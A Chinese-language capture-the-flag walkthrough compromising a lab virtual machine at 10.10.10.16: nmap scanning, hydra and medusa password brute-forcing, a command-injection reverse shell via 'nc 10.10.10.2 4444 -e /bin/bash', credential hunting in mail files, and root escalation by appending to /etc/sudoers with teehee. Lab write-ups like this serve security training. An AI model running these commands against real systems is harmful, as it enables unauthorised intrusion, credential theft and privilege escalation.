靶机下载地址
信息收集
主机探测
获取目标靶机IP:10.10.10.16
初步扫描
sudo nmap -sT --min-rate 10000 -p- 10.10.10.16
就22,80端口
详细信息扫描
sudo nmap -sT -sC -sV -O -p 22,80 10.10.10.16
漏洞脚本扫描
sudo nmap -sT --script=vuln -p 22,80 10.10.10.16
无可利用漏洞信息
渗透流程
密码爆破
访问80端口,没有任何其它信息,并且无限制次数登录,只能爆破了。可使用Burpsuit,也可使用hydra,反正我用的hydra因为burpsuit太卡了。
使用charles ^xHhA&hvim0y成功登录
抓包修改代码获取反弹SHELL
发现可以执行代码,但是网页源代码里并没有设置执行的代码是什么。
抓包发现命令代码
修改为nc 10.10.10.2 4444 -e /bin/bash,攻击机开启监听,成功获取反弹shell
敏感文件寻找
在/home/jim/backups目录下面发现疑似字典的文件
用python -m SimpleHTTPServer 8000建立服务器,下载字典。
SSH密码破解
查看/etc/passwd查看用户名字典获取三个可登录用户,使用medusa进行密码爆破
sudo medusa -M ssh -h 10.10.10.16 -n 22 -u user -P old-passwords.bak -t 20
成功获取账户名密码User: jim Password: jibril04
SSH登录
寻找邮件
查看当前文件夹下的mail,发现是一封来自root的邮件,内容是this is a test
猜测当前主机存在其它邮件。
用find / -name *mail* 2>/dev/null查看
发现可疑文件jim
查看内容获取到charles的密码^xHhA&hvim0y
权限提升
登录到charles,发现被授予以root的身份执行teehee
发现该命令可向文件追加内容,类似于echo “your_shit”>>/path/to/your/shit
可使用teehee向/etc/sudoers追加内容
charles ALL=(ALL:ALL) ALL
含义是:
charles这个用户在所有主机上以任何身份执行任何命令的权限。
成功提权,获取flag
扫一扫
3017
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
